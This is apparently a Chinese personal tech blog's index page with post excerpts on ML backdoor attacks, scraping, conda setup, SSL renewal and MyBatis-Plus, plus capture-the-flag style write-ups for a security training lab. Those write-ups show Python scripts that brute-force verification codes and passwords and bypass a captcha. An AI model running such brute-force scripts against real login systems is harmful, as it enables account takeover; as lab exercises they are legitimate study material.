文章 35
评论 44
浏览 92268
Dynamic Backdoor Attacks Against Machine Learning Models(Euro E&P2022)论文阅读

Dynamic Backdoor Attacks Against Machine Learning Models(Euro E&P2022)论文阅读

作者提出一种sample-specific的动态后门方法,具体来说有三种效果递进的动态生成触发器算法,不仅有几乎完美的攻击成功率,而且能很好的绕过2020年SOTA后门防御机制。

python实现爬取豆瓣豆列中图书的作者,出版社,出版日期,ISBN号

python实现爬取豆瓣豆列中图书的作者,出版社,出版日期,ISBN号

import requests import lxml.etree as etree import time # 可以继续添加其他豆列 urls_all = ["https://www.douban.com/doulist/40421457/?dt_platform=mobile_qq&dt_dapp=1" ] doulist_name = ["涂绘学院"] # headers换成其他的浏览器的headers hearders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36', } books_all = [] def paqushuju(url): books = [] # 爬取网页中的书名,作者,出版社,出版时间,isbn response = requests.get(url, headers=hearders) html = etree.....

解决使用conda下载pytorch-gpu版本困难的问题(两行命令搞定)

解决使用conda下载pytorch-gpu版本困难的问题(两行命令搞定)

省流:解决办法是使用mamba代替conda,下载速度惊人 conda install mamba -c conda-forge mamba install pytorch==1.12.1 torchvision==0.13.1 torchaudio==0.12.1 cudatoolkit=11.3 -c pytorch 问题1 conda install pytorch torchvision torchaudio pytorch-cuda=11.6 -c pytorch -c nvidia 使用pytorch官网给出的conda命令,会从国外源下载(-c pytoch -c nvidia),常常会出现网络问题。 问题2 conda install pytorch torchvision torchaudio pytorch-cuda=11.6 网上有些资料提到,去掉-c pytoch -c nvidia,使用国内源下载,比如北师大,阿里云。但实际情况是,使用国内源经常会下载pytorch的cpu版本。 根本原因:指定某一版本cudatoolkit下的指定版本的pytorch不....

雨课堂视频自动播放python脚本

雨课堂视频自动播放python脚本

本人声明:仅作学习交流使用 前言:雨课堂支持多开同时播放,视频一个一个播放反而效率低,因此这个视频自动播放脚本意图不在于刷课,仅仅是用雨课堂平台作为实验对象进行编程练习而已。 脚本主要功能和实现方法 功能:根据用户给定的课程,自动播放课程内的所有视频。 实现方法:使用python的selenium库在chromeDriver驱动程序下操作chrome浏览器,根据脚本逻辑实现视频播放。 代码 注意:chromedriver.exe驱动程序要放在文件目录下,下载地址根据本地chrome版本选择适合的驱动程序 from selenium import webdriver import time import os import re from configparser import ConfigParser class AutoPlay: def __init__(self): self.filepath = os.getcwd() self.driver = webdriver.Chrome(executable_path=self.filepath + r'\chrome....

云服务器定期更换SSL证书(详细步骤实操)

云服务器定期更换SSL证书(详细步骤实操)

1:申请证书 下载对应目标服务器的证书类型(nginx对应pem/key,pem是证书,key是证书加密的私钥) 阿里云下载免费证书(图片来自阿里云指南) 2:部署证书 存入云服务器中(可以使用WinSCP工具,方便直接移动文件到远程服务器中) 本网站使用Nginx反向代理,在Nginx配置文件中填入SSL证书的存储路径 打开配置文件 cd /etc/nginx/sites-available vi default 更改配置文件,填入SSL证书绝对路径 3:重启服务器,使得SSL证书生效 netstat -ntlp|grep 80 # 默认nginx端口是80,所以查找占用80端口的进程 kill -9 XXX # XXX为上面命令查到的占用80端口的进程端口 systemctl restart nginx # 重启服务器 4 验证证书生效 打开网站,如果显示502,可以先等一段时间让DNS更新缓存。还是不行的话,检查上述步骤操作是否有疏漏 打开网站,点击左上角的🔒,查看证书是否为刚申请的证书即可。 通过比对可以得知是否已经更新。

网络安全实验室(脚本区 基情燃烧的岁月)

网络安全实验室(脚本区 基情燃烧的岁月)

思路:暴力破解3位纯数字的验证码 坑:在破解前,需要用脚本模拟点击获取验证码的链接,正如实际情况那样,服务器要先发送验证码,你才能开始输入验证码,否则服务器怎么知道你这验证码是不是正确的呢? #coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 import threading curtask = 100 maxtask = 999 flag = False lock = threading.Lock() url = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901" s = requests.session() r1 = s.get(url) url3 = "http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/vcode.php" r = s.post(url=url3,data={ ....

网络安全实验室(脚本区 逗比验证码第二期)

网络安全实验室(脚本区 逗比验证码第二期)

很无语的解题思路:验证码使用一次后就会失效,这句话意思是不需要使用验证码也可以,即验证码为空串。所以表单中vcode="" 更快的暴力方法是用多线程 代码参考https://www.freesion.com/article/53961309685/ import requests, threading url = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php' login = 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php' header = {'Referer': 'http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1'} s = requests.session....

网络安全实验室(脚本区 逗比验证码第一期)

网络安全实验室(脚本区 逗比验证码第一期)

解决本题的关键是维护同一个账号的会话(session),这样验证码就可以确定下来。 先获取到验证码的地址(在r1.text中),手动输入验证码vode,再进行密码爆破 #coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 if __name__ == "__main__": url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php" s = requests.session() r1 = s.get(url) print(r1.text) vcode = input() url2 = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php" for i in range(1000, 10000): res = s.post(url = url2, data={ 'u....

网络安全实验室(脚本区 快速口算题)

网络安全实验室(脚本区 快速口算题)

#coding=utf-8 from http import cookies import requests; from lxml import etree #解析html页面的包 if __name__ == "__main__": url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php" html = requests.get(url) cookie = html.cookies tree = etree.HTML(html.text) #将html解析成树结构 calculate = tree.xpath("/html/body/form/text()[2]")[0] #取出表达式字段 cal = calculate.replace(' ','').replace('=','') #删除空格和等号 result = eval(cal) #使用库函数计算表达式 #带着计算结果提交,注意需要带上cookie,这样才能保证获得运算式的和提交结果的是同一个用户 res = request....

Mybatis-Plus只返回某一个字段的所有记录数据的方法

Mybatis-Plus只返回某一个字段的所有记录数据的方法

需求缘由:因为Mybatis-Plus获得对象中某一个字段值时,一般是默认用get+字段名(),且字段名首字母大写的方法,但是现在我想实现一个功能,就是传入一个字符串参数,这个字符串记录的是想要获取到的字段名,那么如何根据这个字符串来调用对应的get函数呢? @TableName("servermonitor") @Data public class Servermonitor { @TableId(type = IdType.AUTO) private Integer id; private double cpu0temp; private double cpu1temp; private double cpu2temp; private double cpu3temp; private double bmctemp; private double psu1temp; private double psu2temp; private double psu1vin; private double psu2vin; private double totalpower; private d....

Life Is Like A Boat